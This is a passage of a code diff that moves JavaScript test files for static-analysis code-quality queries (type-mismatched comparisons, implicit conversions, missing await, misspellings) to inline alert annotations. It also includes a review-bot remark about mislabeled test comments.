of type null. | tst.js:81:42:81:45 | null | an expression | +| tst.js:91:5:91:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:91:12:91:15 | null | an expression | +| tst.js:94:9:94:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:94:16:94:19 | null | an expression | +| tst.js:100:5:100:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:100:9:100:13 | "def" | an expression | +| tst.js:107:5:107:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:107:9:107:13 | "def" | an expression | +| tst.js:121:5:121:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:121:13:121:14 | 42 | an expression | +| tst.js:124:5:124:8 | true | This expression is of type boolean, but it is compared to $@ of type string. 
| tst.js:124:13:124:17 | "bar" | an expression | +| tst.js:132:5:132:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:132:11:132:14 | "42" | an expression | +| tst.js:133:5:133:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:133:12:133:12 | b | variable 'b' | +| tst.js:134:5:134:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:134:11:134:11 | b | variable 'b' | +| tst.js:138:5:138:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:138:15:138:23 | undefined | 'undefined' | +| tst.js:139:5:139:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:139:19:139:23 | "foo" | an expression | +| tst.js:141:5:141:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:141:13:141:17 | "foo" | an expression | +| tst.js:143:5:143:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:143:18:143:22 | "foo" | an expression | +| tst.js:150:5:150:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:150:12:150:15 | null | an expression | +| tst.js:151:5:151:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:151:14:151:15 | t1 | variable 't1' | +| tst.js:154:5:154:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:154:12:154:15 | null | an expression | +| tst.js:155:5:155:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:155:14:155:15 | t2 | variable 't2' | +| tst.js:158:5:158:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. 
| tst.js:158:12:158:15 | null | an expression | +| tst.js:159:5:159:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:159:14:159:15 | t3 | variable 't3' | +| tst.js:162:5:162:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:162:12:162:15 | null | an expression | +| tst.js:163:5:163:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:163:14:163:15 | t4 | variable 't4' | +| tst.js:166:5:166:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. | tst.js:166:12:166:15 | null | an expression | +| tst.js:167:5:167:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:167:14:167:15 | t5 | variable 't5' | +| tst.js:170:5:170:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:170:12:170:15 | null | an expression | +| tst.js:171:5:171:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:171:14:171:15 | t6 | variable 't6' | +| tst.js:174:5:174:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:174:12:174:15 | null | an expression | +| tst.js:175:5:175:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:175:14:175:15 | t7 | variable 't7' | +| tst.js:178:5:178:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:178:12:178:15 | null | an expression | +| tst.js:179:5:179:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. 
| tst.js:179:14:179:15 | t8 | variable 't8' | +| tst.js:192:5:192:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:192:12:192:13 | t4 | variable 't4' | +| tst.js:193:5:193:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:193:12:193:13 | t2 | variable 't2' | +| tst.js:194:5:194:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:194:12:194:13 | t4 | variable 't4' | +| tst.js:195:5:195:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:195:12:195:13 | t3 | variable 't3' | +| tst.js:197:5:197:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:197:12:197:13 | t5 | variable 't5' | +| tst.js:198:5:198:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:198:12:198:13 | t2 | variable 't2' | +| tst.js:199:5:199:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:199:12:199:13 | t5 | variable 't5' | +| tst.js:200:5:200:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:200:12:200:13 | t3 | variable 't3' | +| tst.js:215:13:215:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:215:20:215:24 | "foo" | an expression | +| tst.js:223:5:223:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. 
| tst.js:223:11:223:12 | 42 | an expression | diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref index 13b0e2a181cb..22ce4796bb35 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref @@ -1 +1,2 @@ -Expressions/HeterogeneousComparison.ql \ No newline at end of file +query: Expressions/HeterogeneousComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js index 82e536676198..0d2af62c7bf6 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js @@ -8,13 +8,13 @@ // disable the whitelist known = known; unknown = unknown; gotKnown = gotKnown; gotUnknown = gotUnknown; - known === 42; + known === 42; // $ Alert known == 42; gotKnown === 42; gotKnown == 42; - getKnown() === 42; + getKnown() === 42; // $ Alert getKnown() == 42; - getKnown_indirect() === 42; + getKnown_indirect() === 42; // $ Alert getKnown_indirect() == 42; unknown === 42; diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js index f500d4cdafce..c441f4834658 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js 
@@ -1,137 +1,127 @@ -// NOT OK -if (typeof window !== undefined) +if (typeof window !== undefined) // $ Alert console.log("browser"); -// OK + if (typeof window === "undefined") console.log("not a browser"); -// NOT OK -if ("Hello, world".indexOf("Hello" >= 0)) +if ("Hello, world".indexOf("Hello" >= 0)) // $ Alert console.log("It's in there."); -// OK + true < 1; -// OK + undefined == null; -// NOT OK -null == 0; +null == 0; // $ Alert -// NOT OK switch ("hi") { -case 42: +case 42: // $ Alert } -// NOT OK -Object.toString() + "!" == undefined; +Object.toString() + "!" == undefined; // $ Alert -// NOT OK -(+f() || !g() || (h() + k())) == undefined; +(+f() || !g() || (h() + k())) == undefined; // $ Alert -// NOT OK -if (!Module['load'] == 'undefined') { +if (!Module['load'] == 'undefined') { // $ Alert } function f(x) { return true; - // OK + return x === 42; } function g() { var number = 0; // number - // OK + number == "0"; - // NO OK - number == "zero"; + + number == "zero"; // $ Alert } -// NOT OK -0 < (Math.random() > 0.5 ? void 0 : [1, 2]); +0 < (Math.random() > 0.5 ? 
void 0 : [1, 2]); // $ Alert + -// OK '100' < 1000; -// OK (fvsvo "OK") +// OK - fvsvo "OK" 100 > ''; -// OK + new Date('foo') == 'Invalid Date'; -// OK + new String('bar') == 'bar'; -// OK + ({ valueOf: () => true } == true); -// OK + ({ valueOf: () => 42 } == 42); -// OK + ({ valueOf: () => 'hi' } == 'hi'); -// OK + ({ valueOf: () => null } == null); -// NOT OK, but not currently flagged since we conservatively -// assume that `new Date(123)` could return any object, not necessarily a Date -new Date(123) == 123 +new Date(123) == 123; // $ MISSING: Alert - we conservatively assume that `new Date(123)` could return any object, not necessarily a Date function f(x1, x2, x3, x4, x5, x6){ - typeof x1 === 'object' && x1 !== null; // OK + typeof x1 === 'object' && x1 !== null; if (!x2) { x2 = new Error(); } - typeof x2 === 'object' && x2 !== null; // NOT OK: x2 cannot be null here + typeof x2 === 'object' && x2 !== null; // $ Alert - x2 cannot be null here if (x3) { - typeof x3 === 'object' && x3 !== null; // NOT OK: x3 cannot be null here + typeof x3 === 'object' && x3 !== null; // $ Alert - x3 cannot be null here } if (!x4) { - typeof x4 === 'object' && x4 !== null; // OK + typeof x4 === 'object' && x4 !== null; } if (!x5) { x5 = new Error(); } - x5 !== null; // NOT OK: x2 cannot be null here + x5 !== null; // $ Alert - x2 cannot be null here if (x6) { - x6 !== null; // NOT OK: x3 cannot be null here + x6 !== null; // $ Alert - x3 cannot be null here } } function g() { var o = {}; - o < "def"; // NOT OK + o < "def"; // $ Alert var p = { toString() { return "abc"; } }; - p < "def"; // OK + p < "def"; function A() {} var a = new A(); - a < "def"; // NOT OK + a < "def"; // $ Alert function B() {}; B.prototype = p; var b = new B(); - b < "def"; // OK + b < "def"; function C() { this.valueOf = function() { return 42; }; } var c = new C(); - c != 23; // OK + c != 23; null.valueOf = function() { return 42; }; - null == 42; // NOT OK + null == 42; // $ Alert true.valueOf = 
function() { return "foo" }; - true != "bar"; // NOT OK + true != "bar"; // $ Alert } @@ -139,54 +129,54 @@ function h() { var a = 42; var b = "42"; - a === "42"; // NOT OK - 42 === b // NOT OK - a === b; // NOT OK + a === "42"; // $ Alert + 42 === b // $ Alert + a === b; // $ Alert } function i() { - "foo" === undefined - undefined === "foo" // NOT OK + "foo" === undefined // $ Alert + undefined === "foo" // $ Alert var NaN = 0; // trick analysis to consider warning about NaN, for the purpose of testing pretty printing - NaN === "foo" // NOT OK + NaN === "foo" // $ Alert var Infinity = 0; // trick analysis to consider warning about Infinity, for the purpose of testing pretty printing - Infinity === "foo" // NOT OK + Infinity === "foo" // $ Alert } function k() { // tests for pretty printing of many types var t1 = 42; - t1 !== null; // NOT OK - null !== t1; // NOT OK + t1 !== null; // $ Alert + null !== t1; // $ Alert var t2 = unknown? t1: "foo"; - t2 !== null; // NOT OK - null !== t2; // NOT OK + t2 !== null; // $ Alert + null !== t2; // $ Alert var t3 = unknown? t2: undefined; - t3 !== null; // NOT OK - null !== t3; // NOT OK + t3 !== null; // $ Alert + null !== t3; // $ Alert var t4 = unknown? t3: true; - t4 !== null; // NOT OK - null !== t4; // NOT OK + t4 !== null; // $ Alert + null !== t4; // $ Alert var t5 = unknown? t4: function(){}; - t5 !== null; // NOT OK - null !== t5; // NOT OK + t5 !== null; // $ Alert + null !== t5; // $ Alert var t6 = unknown? t5: /t/; - t6 !== null; // NOT OK - null !== t6; // NOT OK + t6 !== null; // $ Alert + null !== t6; // $ Alert var t7 = unknown? t6: {}; - t7 !== null; // NOT OK - null !== t7; // NOT OK + t7 !== null; // $ Alert + null !== t7; // $ Alert var t8 = unknown? t8: new Symbol(); - t8 !== null; // NOT OK - null !== t8; // NOT OK + t8 !== null; // $ Alert + null !== t8; // $ Alert } 
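Review bot: The explanatory text on the `x5` and `x6` checks in `f(x1, x2, x3, x4, x5, x6)` (hunk `@@ -1,137 +1,127 @@`) names the wrong variables. The rewritten lines still read `x5 !== null; // $ Alert - x2 cannot be null here` and `x6 !== null; // $ Alert - x3 cannot be null here`, a copy-paste slip carried over from the old `// NOT OK:` comments. Since these lines are being touched anyway, they should read `x5 !== null; // $ Alert - x5 cannot be null here` and `x6 !== null; // $ Alert - x6 cannot be null here`. That matches the rows for `Variable 'x5'` and `Variable 'x6'` in HeterogeneousComparison.expected. This assumes the text after `$ Alert - ` is free-form commentary, as it appears to be elsewhere in this diff, so the fix would not change the test outcome.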
@@ -199,22 +189,22 @@ function l() { var t4 = unknown? 42: unknown? "foo": unknown? undefined: true; var t5 = unknown? t4: null - t2 !== t4; // NOT OK - t4 !== t2; // NOT OK - t3 !== t4; // NOT OK - t4 !== t3; // NOT OK + t2 !== t4; // $ Alert + t4 !== t2; // $ Alert + t3 !== t4; // $ Alert + t4 !== t3; // $ Alert - t2 !== t5; // NOT OK - t5 !== t2; // NOT OK - t3 !== t5; // NOT OK - t5 !== t3; // NOT OK + t2 !== t5; // $ Alert + t5 !== t2; // $ Alert + t3 !== t5; // $ Alert + t5 !== t3; // $ Alert } -1n == 1; // OK +1n == 1; (function tooGeneralLocalFunctions(){ function f1(x) { - if (x === "foo") { // OK, whitelisted + if (x === "foo") { // OK - whitelisted } } @@ -222,7 +212,7 @@ function l() { function f2(x, y) { var xy = o.q? x: y; - if (xy === "foo") { // NOT OK (not whitelisted like above) + if (xy === "foo") { // $ Alert - not whitelisted like above } } @@ -230,5 +220,5 @@ function l() { })(); function f(...x) { - x === 42 + x === 42 // $ Alert }; diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected index 3168aa8b1a0b..51a9ebb1f0a3 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected 
@@ -1,17 +1,17 @@ -| tst.js:2:1:2:7 | !method | This expression will be implicitly converted from boolean to string. | -| tst.js:17:6:17:9 | null | This expression will be implicitly converted from null to object. | -| tst.js:20:6:20:13 | 'string' | This expression will be implicitly converted from string to object. | -| tst.js:26:13:26:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | -| tst.js:29:18:29:26 | !callback | This expression will be implicitly converted from boolean to object. | -| tst.js:53:5:53:10 | void 0 | This expression will be implicitly converted from undefined to number. | -| tst.js:61:3:61:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:67:8:67:8 | y | This expression will be implicitly converted from undefined to number. | -| tst.js:73:5:73:5 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:79:19:79:22 | name | This expression will be implicitly converted from undefined to string. | -| tst.js:85:3:85:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:100:5:100:7 | f() | This expression will be implicitly converted from undefined to number. | -| tst.js:106:5:106:7 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:109:13:109:15 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:110:13:110:15 | g() | This expression will be implicitly converted from undefined to string. | -| tst.js:117:8:117:8 | y | This expression will be implicitly converted from string to number. | -| tst.js:122:10:122:10 | y | This expression will be implicitly converted from string to number. | +| tst.js:1:1:1:7 | !method | This expression will be implicitly converted from boolean to string. | +| tst.js:15:6:15:9 | null | This expression will be implicitly converted from null to object. 
| +| tst.js:17:6:17:13 | 'string' | This expression will be implicitly converted from string to object. | +| tst.js:22:13:22:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | +| tst.js:24:18:24:26 | !callback | This expression will be implicitly converted from boolean to object. | +| tst.js:47:5:47:10 | void 0 | This expression will be implicitly converted from undefined to number. | +| tst.js:54:3:54:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:59:8:59:8 | y | This expression will be implicitly converted from undefined to number. | +| tst.js:64:5:64:5 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:69:19:69:22 | name | This expression will be implicitly converted from undefined to string. | +| tst.js:74:3:74:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:89:5:89:7 | f() | This expression will be implicitly converted from undefined to number. | +| tst.js:95:5:95:7 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:98:13:98:15 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:99:13:99:15 | g() | This expression will be implicitly converted from undefined to string. | +| tst.js:106:8:106:8 | y | This expression will be implicitly converted from string to number. | +| tst.js:111:10:111:10 | y | This expression will be implicitly converted from string to number. | diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref index 748469112b00..259f3333169e 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref 
+++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.qlref @@ -1 +1,2 @@ -Expressions/ImplicitOperandConversion.ql \ No newline at end of file +query: Expressions/ImplicitOperandConversion.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js index 811ef9c576c9..a72dc333dac5 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js @@ -1,41 +1,36 @@ -// NOT OK -!method in obj; +!method in obj; // $ Alert + -// OK !(method in obj); -// OK + '__proto__' in obj; -// OK + 0 in obj; -// OK + ('$' + key) in obj; -// NOT OK -p in null; +p in null; // $ Alert + +0 in 'string'; // $ Alert -// NOT OK -0 in 'string'; -// OK p in {}; -// NOT OK -console.log("Setting device's bluetooth name to '%s'" % device_name); +console.log("Setting device's bluetooth name to '%s'" % device_name); // $ Alert -// NOT OK -if (!callback || !callback instanceof Function) { +if (!callback || !callback instanceof Function) { // $ Alert ; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// OK + function cmp(x, y) { if (x > y) return 1; 
@@ -44,48 +39,42 @@ function cmp(x, y) { return 0; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// NOT OK -1 + void 0 +1 + void 0 // $ Alert + -// OK o[true] = 42; function f() { var x; - // NOT OK - x -= 2; + x -= 2; // $ Alert } function g() { var x = 19, y; - // NOT OK - x %= y; + x %= y; // $ Alert } function h() { var x; - // NOT OK - ++x; + ++x; // $ Alert } function k() { var name; - // NOT OK - return `Hello ${name}!`; + return `Hello ${name}!`; // $ Alert } function l() { var x; - // NOT OK - x ** 2; + x ** 2; // $ Alert } -1n + 1; // NOT OK, but not currently flagged +1n + 1; // $ MISSING: Alert (function(){ let sum = 0; @@ -97,27 +86,27 @@ function l() { (function(){ function f() { } - f()|0; + f()|0; // $ Alert unknown()|0; function g() { } - g()|0; + g()|0; // $ Alert g(); - var a = g() + 2; - var b = g() + "str"; + var a = g() + 2; // $ Alert + var b = g() + "str"; // $ Alert }); function m() { var x = 19, y = "string"; - x %= y; // NOT OK - x += y; // OK - x ||= y; // OK - x &&= y; // OK - x ??= y; // OK - x >>>= y; // NOT OK + x %= y; // $ Alert + x += y; + x ||= y; + x &&= y; + x ??= y; + x >>>= y; // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref b/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref index 05596cf67218..42bdeec727c7 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/MissingAwait.qlref @@ -1 +1,2 @@ -Expressions/MissingAwait.ql \ No newline at end of file +query: Expressions/MissingAwait.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts index 4362c11a8e67..5f1774f1ab56 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts 
+++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts @@ -1,5 +1,5 @@ declare let cache: { [x: string]: Promise }; function deleteCache(x: string) { - delete cache[x]; // OK + delete cache[x]; } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js index 10fc244dbc44..61f599a6c33d 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js @@ -5,24 +5,24 @@ async function getThing() { function useThing() { let thing = getThing(); - if (thing === undefined) {} // NOT OK + if (thing === undefined) {} // $ Alert - if (thing == null) {} // NOT OK + if (thing == null) {} // $ Alert - something(thing ? 1 : 2); // NOT OK + something(thing ? 1 : 2); // $ Alert - for (let x in thing) { // NOT OK + for (let x in thing) { // $ Alert something(x); } let obj = something(); - something(obj[thing]); // NOT OK - obj[thing] = 5; // NOT OK + something(obj[thing]); // $ Alert + obj[thing] = 5; // $ Alert - something(thing + "bar"); // NOT OK + something(thing + "bar"); // $ Alert if (something()) { - if (thing) { // NOT OK + if (thing) { // $ Alert something(3); } } @@ -31,21 +31,21 @@ function useThing() { async function useThingCorrectly() { let thing = await getThing(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // OK + return thing + "bar"; } async function useThingCorrectly2() { let thing = getThing(); - if (await thing === undefined) {} // OK + if (await thing === undefined) {} - if (await thing == null) {} // OK + if (await thing == null) {} - return thing + "bar"; // NOT OK + return thing + "bar"; // $ Alert } function getThingSync() { 
@@ -55,21 +55,21 @@ function getThingSync() { function useThingPossiblySync(b) { let thing = b ? getThing() : getThingSync(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // NOT OK - but we don't flag it + return thing + "bar"; // $ MISSING: Alert } function useThingInVoid() { - void getThing(); // OK + void getThing(); } function useThing() { if (random()) { - return getThing() ?? null; // NOT OK + return getThing() ?? null; // $ Alert } else { - return getThing?.() ?? null; // OK + return getThing?.() ?? null; } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js index cbfe6d3250e5..d12e82cb8c24 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js +++ b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js @@ -1,6 +1,6 @@ function total(bad) { var sum = 0 - for (var i = 0; i < bad; ++i) { // NOT OK + for (var i = 0; i < bad; ++i) { // $ Alert sum += bad[i] } return sum @@ -8,7 +8,7 @@ function total(bad) { function total_good(good) { var sum = 0 - for (var i = 0; i < good.length; ++i) { // OK + for (var i = 0; i < good.length; ++i) { sum += good[i] } return sum 
@@ -17,21 +17,21 @@ function total_good(good) { var fruits = ["banana", "pineapple"] function mix() { var drink = [] - for (var i = 0; i < fruits; ++i) { // NOT OK + for (var i = 0; i < fruits; ++i) { // $ Alert drink.push(fruits[i]) } } function mix_good() { var drink = [] - for (var i = 0; i < fruits.length; ++i) { // OK + for (var i = 0; i < fruits.length; ++i) { drink.push(fruits[i]) } } function overloaded(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } else if (mode == "blar") { return foo[bar]; } else { @@ -41,7 +41,7 @@ function overloaded(mode, foo, bar) { function overloaded_no_else(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } if (mode == "blar") { return foo[bar]; @@ -50,7 +50,7 @@ function overloaded_no_else(mode, foo, bar) { function reassigned(index, object) { var tmp = object.getMaximum() - if (index < tmp) { // OK + if (index < tmp) { tmp = object.getArray() return tmp[index] } diff --git a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref index 2f3f0ef91259..022ddb3021ce 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref +++ b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.qlref @@ -1 +1,2 @@ -Expressions/MissingDotLengthInComparison.ql +query: Expressions/MissingDotLengthInComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref index a9b914e23115..94b18824cca5 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref 
+++ b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/MissingSpaceInAppend.qlref @@ -1 +1,2 @@ -Expressions/MissingSpaceInAppend.ql +query: Expressions/MissingSpaceInAppend.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js index bdb85cc5bb11..36a28584382e 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js +++ b/javascript/ql/test/query-tests/Expressions/MissingSpaceInAppend/missing.js @@ -1,32 +1,32 @@ var s; -s = "this text" + +s = "this text" + // $ Alert "is missing a space"; -s = "the class java.util.ArrayList" + +s = "the class java.util.ArrayList" + // $ Alert "without a space"; -s = "This isn't" + +s = "This isn't" + // $ Alert "right."; -s = "There's 1" + +s = "There's 1" + // $ Alert "thing wrong"; -s = "There's A/B" + +s = "There's A/B" + // $ Alert "and no space"; -s = "Wait for it...." + +s = "Wait for it...." + // $ Alert "No space!"; -s = "Is there a space?" + +s = "Is there a space?" + // $ Alert "No!"; -("missing " + "a space") + "here"; +("missing " + "a space") + "here"; // $ Alert // syntactic variants: -s = "missing a space" + +s = "missing a space" + // $ Alert "here"; -s = 'missing a space' + +s = 'missing a space' + // $ Alert 'here'; -s = `missing a space` + +s = `missing a space` + // $ Alert "here"; -s = "missing a space" + +s = "missing a space" + // $ Alert `here`; -s = `missing a space` + +s = `missing a space` + // $ Alert `here`; -s = (("missing space") + "here") +s = (("missing space") + "here") // $ Alert -s = (("h. 0" + "h")) + "word" +s = (("h. 0" + "h")) + "word" // $ Alert 
diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected
index 1bf8599b8be5..05bc8f28ad14 100644
--- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected
+++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected
@@ -1,6 +1,6 @@
-| tst.js:5:19:5:24 | lenght | 'lenght' may be a typo for 'length'. |
-| tst.js:26:5:26:10 | lenght | 'lenght' may be a typo for 'length'. |
-| tst.js:26:16:26:21 | lenght | 'lenght' may be a typo for 'length'. |
-| tst.js:32:27:32:34 | avalable | 'avalable' may be a typo for 'available'. |
-| tst.js:42:5:42:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. |
-| tst.js:43:5:43:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. |
+| tst.js:4:19:4:24 | lenght | 'lenght' may be a typo for 'length'. |
+| tst.js:24:5:24:10 | lenght | 'lenght' may be a typo for 'length'. |
+| tst.js:24:16:24:21 | lenght | 'lenght' may be a typo for 'length'. |
+| tst.js:29:27:29:34 | avalable | 'avalable' may be a typo for 'available'. |
+| tst.js:39:5:39:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. |
+| tst.js:40:5:40:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. |
diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref
index fc411787f5bf..4f10b063bb99 100644
--- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref
+++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.qlref
